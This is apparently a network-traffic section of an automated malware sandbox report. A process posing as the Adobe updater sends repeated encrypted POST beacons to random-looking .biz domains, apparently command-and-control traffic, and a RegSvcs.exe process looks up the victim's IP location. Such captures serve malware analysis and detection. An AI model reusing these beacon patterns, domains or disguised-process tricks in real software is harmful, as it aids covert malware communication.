Dec 10, 2024 16:24:21.235548973 CET | 850 | OUT | Data Raw: a2 4c 99 c2 47 28 ea 64 46 03 00 00 ec 42 78 62 b6 76 ad 5f b2 de 68 8c a7 ac 6d 38 8c 6f 4b eb 13 93 5a 6a a4 00 ba 51 2d e9 a6 2d 57 19 1a 6a 32 ba 2a b7 5c 03 b9 b7 32 d4 1e 9f 23 cf bf 26 61 26 55 ef 35 22 6e e1 bf e9 69 19 4d 47 b1 0e c5 cb
    Data Ascii: LG(dFBxbv_hm8oKZjQ--Wj2*\2#&a&U5"niMGy8k2m[Hjs@!arI^JD/e`y<$UmwbJs95-;YESGLa10yjS%gsEY%9z8@5N>2^P]6-b+|
Dec 10, 2024 16:24:22.325201988 CET | 412 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 10 Dec 2024 15:24:22 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=512f2f680bc47f5048d2cb9aeb2c66a8|8.46.123.175|1733844262|1733844262|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49734 | 172.234.222.138 | 80 | 6336 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:23.080528021 CET | 351 | OUT | POST /opymuwnb HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Dec 10, 2024 16:24:23.080619097 CET | 850 | OUT | Data Raw: d5 65 48 9b 9f c6 28 2d 46 03 00 00 3a c1 fc e4 28 af d0 9a f4 1a 2c 13 6f e1 76 6d cb 8d 61 ca 05 12 0b 03 ed b2 14 ef 40 14 05 63 b2 2e 6f 69 7b 8d 53 6e 9d 3d 12 00 bd 74 de 06 c4 3b fa b1 e2 7b 62 06 69 70 c6 bf 8e a1 57 6a 5a 02 c1 65 5d 0a
    Data Ascii: eH(-F:(,ovma@c.oi{Sn=t;{bipWjZe]4AvqELa<Y88'`C5fC m_X#NrLv;D>}/8eu:< T&}nF`YBfm9qM53
Dec 10, 2024 16:24:24.217123032 CET | 470 | IN | HTTP/1.1 302 Moved Temporarily
    Server: openresty
    Date: Tue, 10 Dec 2024 15:24:24 GMT
    Content-Type: text/html
    Content-Length: 142
    Connection: keep-alive
    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
    Location: http://ww99.przvgke.biz/opymuwnb
    Cache-Control: no-store, max-age=0
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Dec 10, 2024 16:24:28.568732977 CET | 349 | OUT | POST /meqybx HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Dec 10, 2024 16:24:28.568873882 CET | 850 | OUT | Data Raw: 65 a5 d9 91 da 61 9a b1 46 03 00 00 cf 2e 4a b6 f0 1d ad 3f f2 d3 1c 2e c5 3a a1 5a 26 93 57 00 d7 2f ad d5 0d 4c a8 9c 5f 0c df 57 45 5e 5d db bb 8e 8d 1f 72 55 64 eb ca de 2e 0c 46 2f b0 5e 56 2d d9 a1 53 e5 dd 42 49 10 31 89 4a bb 48 38 5c 0c
    Data Ascii: eaF.J?.:Z&W/L_WE^]rUd.F/^V-SBI1JH8\!J)&r`ile",Gkr8PvM;LW?[AO,kV1N*2"YW-|Xv4 }'qH~jnN*HAa`T#>|RCO/y\M**p@


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49741 | 72.52.179.174 | 80 | 6336 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:25.179752111 CET | 334 | OUT | GET /opymuwnb HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Host: ww99.przvgke.biz
Dec 10, 2024 16:24:26.348642111 CET | 282 | IN | HTTP/1.1 302 Moved Temporarily
    Date: Tue, 10 Dec 2024 15:24:26 GMT
    Content-Type: text/html
    Content-Length: 0
    Connection: keep-alive
    Location: http://ww12.przvgke.biz/opymuwnb?usid=26&utid=9416579686
    Cache-Control: no-cache
    Pragma: no-cache
    Access-Control-Allow-Origin: *


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49745 | 76.223.26.96 | 80 | 6336 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:26.908724070 CET | 358 | OUT | GET /opymuwnb?usid=26&utid=9416579686 HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Host: ww12.przvgke.biz
Dec 10, 2024 16:24:28.200849056 CET | 825 | IN | HTTP/1.1 200 OK
    Accept-Ch: viewport-width
    Accept-Ch: dpr
    Accept-Ch: device-memory
    Accept-Ch: rtt
    Accept-Ch: downlink
    Accept-Ch: ect
    Accept-Ch: ua
    Accept-Ch: ua-full-version
    Accept-Ch: ua-platform
    Accept-Ch: ua-platform-version
    Accept-Ch: ua-arch
    Accept-Ch: ua-model
    Accept-Ch: ua-mobile
    Accept-Ch-Lifetime: 30
    Content-Type: text/html; charset=UTF-8
    Date: Tue, 10 Dec 2024 15:24:27 GMT
    Server: Caddy
    Server: nginx
    Vary: Accept-Encoding
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_MPQJD7SRwpp/8H9LKWnZYJxk63xeOqMMtEr2RLq1GtBUUYPh4MOXtEZv71h8VpGGTyYyMzFxIAAJPJlDrFLM9A==
    X-Domain: przvgke.biz
    X-Pcrew-Blocked-Reason:
    X-Pcrew-Ip-Organization: CenturyLink
    X-Subdomain: ww12
    Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49756 | 18.141.10.107 | 80 | 6336 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:30.030884027 CET | 352 | OUT | POST /tydyiliq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 10, 2024 16:24:30.031089067 CET | 850 | OUT | Data Raw: 4f 64 6d ab 51 ea 70 1f 46 03 00 00 2c 86 d0 2f e6 ca 0e 8d b5 ac c7 67 37 d4 ef c1 ad 67 60 9b 0c da e1 36 08 37 3c f6 84 49 e8 6f 28 6b 50 b4 0e 90 9b f2 3f 89 b7 25 3e 73 f3 fb 44 53 b1 19 3a 9a 2c ae 76 b4 e1 e8 cb 76 27 a0 51 be ee 36 53 9c
Dec 10, 2024 16:24:32.045830965 CET | 412 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 10 Dec 2024 15:24:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6109d80e9b4564a356edadc5011f2a64|8.46.123.175|1733844271|1733844271|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 49763 | 82.112.184.197 | 80 | 6336 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:33.760775089 CET | 346 | OUT | POST /hncx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 10, 2024 16:24:33.760775089 CET | 850 | OUT | Data Raw: a2 09 ba a8 cd c1 28 db 46 03 00 00 c1 4e bc 6f a6 21 6b c9 55 13 2b 9d 2c 82 a5 6e 44 1f ae 9f 12 3b 91 a3 3f 38 d5 ba 52 9e d0 dc 14 90 a6 d1 76 19 48 62 34 00 86 15 8c 17 91 4c f4 4e 4b 58 bb f6 d2 2e ce 18 1c ff c2 d5 d7 7e 76 e0 33 ce d9 d0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 49815 | 82.112.184.197 | 80 | 6336 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:55.833528042 CET | 355 | OUT | POST /fprrydnqfsccl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 10, 2024 16:24:55.833553076 CET | 850 | OUT | Data Raw: ac aa f9 63 96 5f cc 5b 46 03 00 00 81 39 1a 84 4f ed fa 8b dd c8 bb ba e5 ab 65 32 43 e1 e1 d3 0e bc ef 56 00 05 19 71 fb a6 51 45 94 04 55 67 f6 74 e6 7f 7c a0 3b 51 e0 31 2a c6 2a 83 dc 83 29 18 3c d7 ae f5 3e 2f d0 7b b5 d7 f9 16 ce 87 c1 af


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 49872 | 82.112.184.197 | 80 | 6336 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:25:19.263192892 CET | 347 | OUT | POST /kp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 10, 2024 16:25:19.263308048 CET | 850 | OUT | Data Raw: a1 22 ce 6d 1d 18 f3 30 46 03 00 00 62 81 ab 6a 2d f9 c7 6e 20 41 8d ee 0f 50 04 05 0c 6f 1e c0 c4 6e 44 b0 e7 02 f4 0a 6d 14 32 02 01 a5 95 58 15 7a c9 e0 ea e3 c9 0a 88 9b e7 2a 00 8b 5e c1 71 03 6a b7 54 91 72 d0 64 28 d6 82 e6 e1 f0 e6 f4 a1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 49916 | 82.112.184.197 | 80 | 6336 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:25:41.324840069 CET | 350 | OUT | POST /hptny HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 10, 2024 16:25:41.324919939 CET | 850 | OUT | Data Raw: 74 01 c2 33 f2 f3 e7 14 46 03 00 00 72 c0 c9 ef 2e c2 d0 db 9e aa 08 6c f4 ab 64 7b 3d 11 ca 07 b0 1d 5f 71 d7 84 d7 fe 02 0a 60 69 68 d1 01 51 02 74 80 51 6b dc 2a b6 02 cb 39 d6 7e 79 21 32 7c 3d dd 19 80 7c 57 2e ee ca 7b 66 42 c0 12 c1 7d a6


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 49966 | 47.129.31.212 | 80 | 6336 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:26:04.881828070 CET | 358 | OUT | POST /sqemlirtfccimfo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 10, 2024 16:26:04.881864071 CET | 850 | OUT | Data Raw: 4f a7 b7 e8 24 37 1a cb 46 03 00 00 9c bf 34 91 89 ec 13 2f d9 91 da 8e 4c c6 f4 0c a0 26 7c 85 55 7b 67 ae 27 ec 56 64 10 a1 1a 88 5c f9 9d ec c1 91 d1 58 ae aa 46 49 7e e1 f0 71 f1 22 11 a0 4e 0f c3 f3 7c 91 a5 c3 50 d9 98 59 a8 f0 fb 03 ed ea
Dec 10, 2024 16:26:06.959920883 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 10 Dec 2024 15:26:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0bb489b072230014809904507c25a33b|8.46.123.175|1733844366|1733844366|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 49972 | 13.251.16.150 | 80 | 6336 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:26:08.098440886 CET | 354 | OUT | POST /vcyisuboorqd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 10, 2024 16:26:08.098464966 CET | 850 | OUT | Data Raw: db a9 cf 1c aa 96 3e 6f 46 03 00 00 84 d7 4f 72 07 15 45 8a a8 66 11 bb 63 94 c1 53 7c 50 9d 8f 1c 60 87 bf 7b 02 6e 0c 7d 9a 87 2a 0a f3 0c e2 b2 48 e2 80 32 51 1d 55 bf b2 c0 3f 70 65 b3 ea 93 c3 80 6c 9e dd 1e 46 5e ec 91 15 99 de e9 81 44 03
Dec 10, 2024 16:26:10.184322119 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 10 Dec 2024 15:26:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=21c087b90081b79c3106bfe3b46d814e|8.46.123.175|1733844369|1733844369|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 16 | Source IP: 192.168.2.7 | Source Port: 49978 | Destination IP: 44.221.84.105 | Destination Port: 80 | PID: 6336 | Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:26:10.914565086 CET | 350 bytes | OUT | POST /peioi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: saytjshyf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 10, 2024 16:26:10.914565086 CET | 850 bytes | OUT | Data Raw: 08 93 b7 70 8b 54 dc 11 46 03 00 00 28 21 7b e9 3b 82 bb 70 bf 8e c3 39 f0 f8 4b f2 fa 19 c9 f4 b0 55 9c 1b 76 a0 8f 21 7a df 8c 9e 4f af 3c 75 1e 89 22 13 4a f4 8d a9 c5 f6 d8 e9 91 2f 0e 68 4a a9 08 f7 1a 84 a3 fd e0 25 10 d2 17 79 77 d0 82 e2
Data Ascii: pTF(!{;p9KUv!zO<u"J/hJ%ywxkWH4n}K,{@I,LvnAKi$_.TiN7{d+(RA;PuxK0E;+PT4^[yOVIf,B&:mapQ:5
Dec 10, 2024 16:26:12.340123892 CET | 413 bytes | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 10 Dec 2024 15:26:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e1faa78bea3315d74f47f9b6ae36d659|8.46.123.175|1733844372|1733844372|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 17 | Source IP: 192.168.2.7 | Source Port: 49984 | Destination IP: 18.141.10.107 | Destination Port: 80 | PID: 6336 | Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:26:13.685950994 CET | 349 bytes | OUT | POST /ymdlhl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 10, 2024 16:26:13.685950994 CET | 850 bytes | OUT | Data Raw: cb 0d d3 11 17 76 ef f2 46 03 00 00 a4 75 1b 6f 81 8d 53 85 54 90 10 93 fd 11 4c 2f 68 1c 6b ce 46 48 17 07 fd c0 89 d6 ae f8 65 bd 24 d1 8f c4 92 f1 9d 58 1f 3e ab 90 4b 6b e2 81 55 88 1b 16 70 1e 11 75 38 81 8b fb f0 93 35 a3 20 63 0f 2a ea 1d
Data Ascii: vFuoSTL/hkFHe$X>KkUpu85 c*92&tU;%|$$.8p/HC\4CdCV[4I\RD-63]X>pM2;C(/FZt1<W9\[r>u8yb5M%f^T&a
Dec 10, 2024 16:26:16.152347088 CET | 411 bytes | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 10 Dec 2024 15:26:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=09dc52fa23dca1182baa6c7e488ff8fb|8.46.123.175|1733844375|1733844375|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 18 | Source IP: 192.168.2.7 | Source Port: 49990 | Destination IP: 172.234.222.143 | Destination Port: 80 | PID: 6336 | Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:26:16.889905930 CET | 351 bytes | OUT | POST /mepglnjkcg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 10, 2024 16:26:16.889938116 CET | 850 bytes | OUT | Data Raw: be b7 2b 64 ec e9 a5 04 46 03 00 00 f9 74 98 00 e8 81 18 fc dc 4a b0 8c c5 5e b0 1f 6e c3 bd 62 a0 94 c1 ab 5a bb c6 df 49 06 0d c8 df d5 f1 85 ac 6d ca 8a a7 e5 55 22 74 be 12 aa d8 6f 86 44 72 91 b2 55 57 a4 55 8e 62 cc 89 34 6e 3d 13 9d 54 f4
Data Ascii: +dFtJ^nbZImU"toDrUWUb4n=T){0.~bggS5iu`9/eVfbR^Tce#"eV+BxZ=xGD#uDpC$gK<fcn!JOSZC?EkC
Dec 10, 2024 16:26:17.973221064 CET | 470 bytes | IN | HTTP/1.1 302 Moved Temporarily
Server: openresty
Date: Tue, 10 Dec 2024 15:26:17 GMT
Content-Type: text/html
Content-Length: 142
Connection: keep-alive
Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
Location: http://ww99.fwiwk.biz/mepglnjkcg
Cache-Control: no-store, max-age=0
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


Session ID: 19 | Source IP: 192.168.2.7 | Source Port: 49995 | Destination IP: 72.52.179.174 | Destination Port: 80 | PID: 6336 | Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:26:18.338757992 CET | 334 bytes | OUT | GET /mepglnjkcg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Host: ww99.fwiwk.biz
Dec 10, 2024 16:26:19.515204906 CET | 282 bytes | IN | HTTP/1.1 302 Moved Temporarily
Date: Tue, 10 Dec 2024 15:26:19 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: http://ww12.fwiwk.biz/mepglnjkcg?usid=26&utid=9416613129
Cache-Control: no-cache
Pragma: no-cache
Access-Control-Allow-Origin: *


Session ID: 0 | Source IP: 192.168.2.7 | Source Port: 49715 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 2724 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:24:18 UTC | 85 bytes | OUT | GET /xml/8.46.123.175 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-10 15:24:18 UTC | 873 bytes | IN | HTTP/1.1 200 OK
Date: Tue, 10 Dec 2024 15:24:18 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 23581
Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hXY4CgA4DZAgBeZzJoLGYT8Q3h7dxmVnR9fItUy9uto7E2fafn2deeQquBAMau9M%2Fsn5PRvlA3NftDnMHunW8ZQjMOhI8qXkRBPQT4MxKHSxclTRNTZDKouaApbtT%2FC5rjtm83N0"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8efe3db7abc332e2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1795&rtt_var=701&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1531200&cwnd=159&unsent_bytes=0&cid=ff8754c2d0defbdc&ts=460&x=0"
2024-12-10 15:24:18 UTC | 362 bytes | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


